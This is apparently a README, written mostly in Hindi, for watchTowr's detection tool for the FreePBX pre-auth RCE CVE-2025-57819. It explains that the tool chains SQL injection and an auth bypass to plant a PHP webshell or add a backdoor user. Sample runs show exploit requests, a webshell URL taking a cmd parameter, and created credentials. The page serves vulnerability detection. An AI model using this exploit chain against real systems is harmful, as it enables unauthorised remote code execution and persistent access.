
CVE-2025-57819 के लिए Python-आधारित डिटेक्शन आर्टिफैक्ट जनरेटर, जो FreePBX pre-auth RCE का SQL इंजेक्शन और ऑथ बाईपास के माध्यम से शोषण करता है ताकि वेबशेल्स तैनात किए जा सकें या बैकडोर उपयोगकर्ता बनाए जा सकें।
FreePBX प्री-ऑथ RCE 1-दिन डिटेक्शन आर्टिफैक्ट जनरेटर टूल
डिटेक्शन आर्टिफैक्ट जनरेटर php स्क्रिप्ट अपलोड करने का प्रयास करता है या यदि अपलोड विफल होता है तो एक नया उपयोगकर्ता जोड़ता है।
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-FreePBX-CVE-2025-57819.py
(*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE
- Piotr and Sonny of watchTowr
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://freepbx.lab.local/this-is-an-ioc-not-actually-watchTowr-pd3o125j59.php?cmd=hostname
[+] Cleaning.sh malicious cron_job - please confirm manually that there is no malicious entries in asterisk.cron_jobs table
यदि php स्क्रिप्ट अपलोड विफल होता है, तो यह उपयोगकर्ता-आधारित डिटेक्शन पर वापस आ जाता है। यह "यादृच्छिक" उपयोगकर्ता नाम और "यादृच्छिक" 12-वर्ण वाला पासवर्ड जोड़ता है।
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-FreePBX-CVE-2025-57819.py
(*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE
- Piotr and Sonny of watchTowr
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[-] Webshell not found - falling back to user adding
[+] Adding user: watchTowrm0njzhj0ii / CdEf2DWGpT8u
[+] Verifying if user exists
[+] VULNERABLE: user added
यह स्क्रिप्ट यह पता लगाने का प्रयास करती है कि FreePBX CVE-2025-57819 प्री-ऑथ RCE के लिए कमजोर है या नहीं।
< 15.0.66
< 16.0.89
< 17.0.3
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr लैब्स टीम को फॉलो करें